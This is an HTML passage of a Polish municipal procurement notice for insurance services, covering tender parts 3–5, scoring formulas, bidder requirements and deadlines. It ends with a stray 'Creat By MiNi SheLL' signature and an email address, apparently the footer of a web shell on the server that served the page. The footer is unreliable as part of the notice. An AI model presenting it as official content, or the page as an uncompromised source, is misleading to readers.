oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 Ubezpieczenie NNW strażaków<br/>1	Ubezpieczenie następstw nieszczęśliwych wypadków członków ochotniczych straży pożarnych.<br/>2	Ubezpieczenie następstw nieszczęśliwych wypadków dla jednostek Ochotniczych Straży Pożarnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Postanowienia dotyczące opcji zostały określone w projektowanych postanowieniach umowy dla tej części zamówienia. <br/>Opcja zwiększająca (doubezpieczenia) - 10% składki za zamówienie podstawowe.<br/>Opcja zmniejszająca - 20% składki za zamówienie podstawowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane punktowo. <br/>Oferty (ważne, niepodlegające odrzuceniu) zostaną ocenione przez zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę:<br/>Kryterium nr 1: Cena - 60 pkt /waga 60%<br/>Kryterium nr 2: Warunki dodatkowe – 40 pkt / waga 40%<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = Pc + Pk<br/>gdzie:<br/>P – ogólna liczba punktów<br/>Pc - punkty otrzymane w kryterium „Cena”<br/>Pk - punkty otrzymane w kryterium „Warunki dodatkowe”<br/>Kryterium nr 1 „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez wykonawcę w formularzu ofertowym ceny za wykonanie zamówienia podstawowego w zakresie objętym SWZ. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone według wzoru:<br/>Pc = (najniższa zaoferowana cena spośród ofert ważnych niepodlegających odrzuceniu/cena oferty badanej)*0,6 (60%)*100<br/>P_c – liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 1.<br/><br/>Kryterium nr 2 „Warunki dodatkowe” punkty za to kryterium zostaną przyznane na podstawie oświadczenia wykonawcy złożonego w formularzu oferty. Ocena dokonana zostanie na podstawie sumy uzyskanych punktów za warunki dodatkowe. Brak oświadczenia wykonawcy (pozostawienie niewypełnionego miejsca) przy warunkach dodatkowych, zostanie uznany przez zamawiającego za „bez zmian” i akceptacje wyłączenie warunku minimalnego z OPZ – oraz przyznanie 0 punków. Zaakceptowanie (podanie TAK) oznacza akceptacje wybranych klauzul fakultatywnych i będzie tożsame z zastosowaniem treści tych klauzul w umowie ubezpieczenia. Treść klauzul fakultatywnych stanowiących warunki dodatkowe została podana w opisie ubezpieczanych ryzyk w odpowiednim załączniku do SWZ: dla Części 1: w załączniku A do SWZ, dla Części 2: w załączniku B do SWZ, dla Części 3: w załączniku C do SWZ, dla Części 4: w załączniku D do SWZ, dla Części 5: w załączniku E do SWZ.<br/><br/>Wyliczenie liczby przyznanych punktów w kryterium nr 2: warunki dodatkowe: <br/>P_k=F_o/F_n x W_k x 100<br/>Pk - liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 2 <br/>Fo - łączna liczba punktów uzyskanych przez ocenianą ofertę za zaakceptowanie wybranych klauzul fakultatywnych<br/>Fn - maksymalna możliwa do uzyskania liczba punktów za zaakceptowanie wszystkich klauzul fakultatywnych<br/>Wk - waga kryterium nr 2 (40%) w postaci ułamka dziesiętnego (0,40)<br/><br/>Szczegółowy sposób oceny ofert opisany został w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 Ubezpieczenie pojazdów <br/>1	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów.<br/>2	Ubezpieczenie AUTO-CASCO.<br/>3	Ubezpieczenie NNW kierowców i pasażerów. <br/>4	Ubezpieczenie Assistance.<br/>5	Ubezpieczenie szyb samochodowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Postanowienia dotyczące opcji zostały określone w projektowanych postanowieniach umowy dla tej części zamówienia. <br/>Opcja zwiększająca (doubezpieczenia) - 10% składki za zamówienie podstawowe.<br/>Opcja zmniejszająca - 30% składki za zamówienie podstawowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane punktowo. <br/>Oferty (ważne, niepodlegające odrzuceniu) zostaną ocenione przez zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę:<br/>Kryterium nr 1: Cena - 60 pkt /waga 60%<br/>Kryterium nr 2: Warunki dodatkowe – 40 pkt / waga 40%<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = Pc + Pk<br/>gdzie:<br/>P – ogólna liczba punktów<br/>Pc - punkty otrzymane w kryterium „Cena”<br/>Pk - punkty otrzymane w kryterium „Warunki dodatkowe”<br/>Kryterium nr 1 „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez wykonawcę w formularzu ofertowym ceny za wykonanie zamówienia podstawowego w zakresie objętym SWZ. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone według wzoru:<br/>Pc = (najniższa zaoferowana cena spośród ofert ważnych niepodlegających odrzuceniu/cena oferty badanej)*0,6 (60%)*100<br/>P_c – liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 1.<br/><br/>Kryterium nr 2 „Warunki dodatkowe” punkty za to kryterium zostaną przyznane na podstawie oświadczenia wykonawcy złożonego w formularzu oferty. Ocena dokonana zostanie na podstawie sumy uzyskanych punktów za warunki dodatkowe. Brak oświadczenia wykonawcy (pozostawienie niewypełnionego miejsca) przy warunkach dodatkowych, zostanie uznany przez zamawiającego za „bez zmian” i akceptacje wyłączenie warunku minimalnego z OPZ – oraz przyznanie 0 punków. Zaakceptowanie (podanie TAK) oznacza akceptacje wybranych klauzul fakultatywnych i będzie tożsame z zastosowaniem treści tych klauzul w umowie ubezpieczenia. Treść klauzul fakultatywnych stanowiących warunki dodatkowe została podana w opisie ubezpieczanych ryzyk w odpowiednim załączniku do SWZ: dla Części 1: w załączniku A do SWZ, dla Części 2: w załączniku B do SWZ, dla Części 3: w załączniku C do SWZ, dla Części 4: w załączniku D do SWZ, dla Części 5: w załączniku E do SWZ.<br/><br/>Wyliczenie liczby przyznanych punktów w kryterium nr 2: warunki dodatkowe: <br/>P_k=F_o/F_n x W_k x 100<br/>Pk - liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 2 <br/>Fo - łączna liczba punktów uzyskanych przez ocenianą ofertę za zaakceptowanie wybranych klauzul fakultatywnych<br/>Fn - maksymalna możliwa do uzyskania liczba punktów za zaakceptowanie wszystkich klauzul fakultatywnych<br/>Wk - waga kryterium nr 2 (40%) w postaci ułamka dziesiętnego (0,40)<br/><br/>Szczegółowy sposób oceny ofert opisany został w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 Ubezpieczenie pojazdów OSP<br/>1	Ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych za szkody powstałe w związku z ruchem tych pojazdów.<br/>2	Ubezpieczenie AUTO-CASCO.<br/>3	Ubezpieczenie NNW kierowców i pasażerów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Postanowienia dotyczące opcji zostały określone w projektowanych postanowieniach umowy dla tej części zamówienia. <br/>Opcja zwiększająca (doubezpieczenia) - 10% składki za zamówienie podstawowe.<br/>Opcja zmniejszająca - 30% składki za zamówienie podstawowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane punktowo. <br/>Oferty (ważne, niepodlegające odrzuceniu) zostaną ocenione przez zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę:<br/>Kryterium nr 1: Cena - 60 pkt /waga 60%<br/>Kryterium nr 2: Warunki dodatkowe – 40 pkt / waga 40%<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = Pc + Pk<br/>gdzie:<br/>P – ogólna liczba punktów<br/>Pc - punkty otrzymane w kryterium „Cena”<br/>Pk - punkty otrzymane w kryterium „Warunki dodatkowe”<br/>Kryterium nr 1 „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez wykonawcę w formularzu ofertowym ceny za wykonanie zamówienia podstawowego w zakresie objętym SWZ. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone według wzoru:<br/>Pc = (najniższa zaoferowana cena spośród ofert ważnych niepodlegających odrzuceniu/cena oferty badanej)*0,6 (60%)*100<br/>P_c – liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 1.<br/><br/>Kryterium nr 2 „Warunki dodatkowe” punkty za to kryterium zostaną przyznane na podstawie oświadczenia wykonawcy złożonego w formularzu oferty. Ocena dokonana zostanie na podstawie sumy uzyskanych punktów za warunki dodatkowe. Brak oświadczenia wykonawcy (pozostawienie niewypełnionego miejsca) przy warunkach dodatkowych, zostanie uznany przez zamawiającego za „bez zmian” i akceptacje wyłączenie warunku minimalnego z OPZ – oraz przyznanie 0 punków. Zaakceptowanie (podanie TAK) oznacza akceptacje wybranych klauzul fakultatywnych i będzie tożsame z zastosowaniem treści tych klauzul w umowie ubezpieczenia. Treść klauzul fakultatywnych stanowiących warunki dodatkowe została podana w opisie ubezpieczanych ryzyk w odpowiednim załączniku do SWZ: dla Części 1: w załączniku A do SWZ, dla Części 2: w załączniku B do SWZ, dla Części 3: w załączniku C do SWZ, dla Części 4: w załączniku D do SWZ, dla Części 5: w załączniku E do SWZ.<br/><br/>Wyliczenie liczby przyznanych punktów w kryterium nr 2: warunki dodatkowe: <br/>P_k=F_o/F_n x W_k x 100<br/>Pk - liczba punktów uzyskanych przez ocenianą ofertę w kryterium nr 2 <br/>Fo - łączna liczba punktów uzyskanych przez ocenianą ofertę za zaakceptowanie wybranych klauzul fakultatywnych<br/>Fn - maksymalna możliwa do uzyskania liczba punktów za zaakceptowanie wszystkich klauzul fakultatywnych<br/>Wk - waga kryterium nr 2 (40%) w postaci ułamka dziesiętnego (0,40)<br/><br/>Szczegółowy sposób oceny ofert opisany został w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki dodatkowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w SWZ, oraz spełniają warunki udziału w postępowaniu, określone na podstawie art. 112 ustawy Pzp dotyczące;<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Opis sposobu dokonywania oceny spełnienia tego warunku: Zamawiający wymaga, aby wykonawca ubiegający się o udzielenie zamówienia, posiadał zezwolenie do wykonywania działalności ubezpieczeniowej zgodnie z przepisami ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej, w grupie ubezpieczeń: <br/>1	w Części 1: 8, 9 i 13 Działu II Załącznika do ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej,<br/>2	w Części 2: 13 Działu II Załącznika do ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej,<br/>3	w Części 3: 1 i 2 Działu II Załącznika do ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej,<br/>4	w Części 4: 1, 2, 3, 10 i 18 Działu II Załącznika do ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej,<br/>5	w Części 5: 1, 2, 3 i 10 Działu II Załącznika do ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, wykonawca dołącza do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu. Wzór oświadczenia stanowi załącznik nr 1 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców. Oświadczenie składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp. Ponieważ zamawiający nie żąda złożenia podmiotowych środków dowodowych, ww. oświadczenie stanowi jedyny dowód brany pod uwagę podczas weryfikacji sytuacji podmiotowej wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Należy złożyć:<br/>1. Formularz oferty - właściwy dla danej części zamówienia<br/>2. Pełnomocnictwo - o ile dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Zamawiający nie wymaga od wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty w postępowaniu.<br/>4. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Zamawiający wymaga, aby przed zawarciem umowy w sprawie zamówienia, wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia, przedstawili zamawiającemu kopię umowy regulującej współpracę tych wykonawców (np. umowę<br/>konsorcjum, poolu lub inną umowę o podobnym charakterze, w szczególności umowę o współpracy).<br/>6. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, posiada<br/>uprawnienia do prowadzenia działalności ubezpieczeniowej w wymaganym zakresie.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi stanowiące przedmiot zamówienia wykonają poszczególni wykonawcy.<br/>8. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunku udziału w postępowaniu, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunku udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunku udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia znajdują się:<br/>w projekcie umowy:<br/>1. załącznik nr 3.1. do SWZ (dla Części 1), <br/>2. załącznik nr 3.2 do SWZ (dla Części 2), <br/>3. załącznik nr 3.3. do SWZ (dla Części 3), <br/>4. załącznik nr 3.4. do SWZ (dla Części 4) <br/>5. załącznik nr 3.5. do SWZ (dla Części 5). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-16 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Miasto Radomsko dnia 5 marca 2024 r. zostało na podstawie „Porozumienia w zakresie wspólnego przeprowadzenia postępowania i udzielenia zamówienia publicznego” jako zamawiający wyznaczony, upoważnione do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego w imieniu i na rzecz wszystkich zamawiających (wskazani w Rozdział 2 pkt 2.1. – 2.4 SWZ), włącznie z prawem do udzielenia zamówienia publicznego. Szczegółowe dane znajdują się w dokumentach zamówienia.<br/>2 W odniesieniu do umowy w sprawie zamówienia publicznego zawartej w wyniku niniejszego postępowania, czynności brokerskie, związane z doradzaniem, proponowaniem lub wykonywaniem innych czynności przygotowawczych zmierzających do zawarcia umowy, w tym udzielaniem pomocy w administrowaniu umową i jej wykonywaniu, także w sprawach o odszkodowanie, wykonuje broker ubezpieczeniowy PWS Konstanta S.A. <br/>3 Termin wykonania zamówienia<br/>3.1	Umowa zostanie zawarty na okres wynoszący 24 miesięcy, w Części 1, 2, 4 i 5 nie wcześniej niż od dnia 1 grudnia 2024 r. do dnia 30 listopada 2026 r., a w Części 3 nie wcześniej niż od dnia 1 stycznia 2025 r. do dnia 31 grudnia 2026 r. <br/>3.2	Sumy ubezpieczenia (gwarancyjne) wskazane w opisie przedmiotu zamówienia, dotyczą każdego dwunastomiesięcznego okresu ubezpieczenia (okresu rozliczeniowego) z zastrzeżeniem możliwości zmiany (aktualizacji) podanych sum ubezpieczenia zgodnie z SWZ.<br/>3.3	Szczegółowe okresy ubezpieczenia opisano w projektowanych postanowieniach umowy oraz opisie przedmiotu zamówienia. <br/>4. Podstawy wykluczenia z postępowania określono w SWZ:<br/>4.1. art. 108 ustawy PZP<br/>4.2. na podstawie art. 7 ust. 1 ustawy sankcyjnej, z postępowania wyklucza się: wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z Platformy e-Zamówienia, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert . Taka oferta zostanie uznana przez<br/>zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com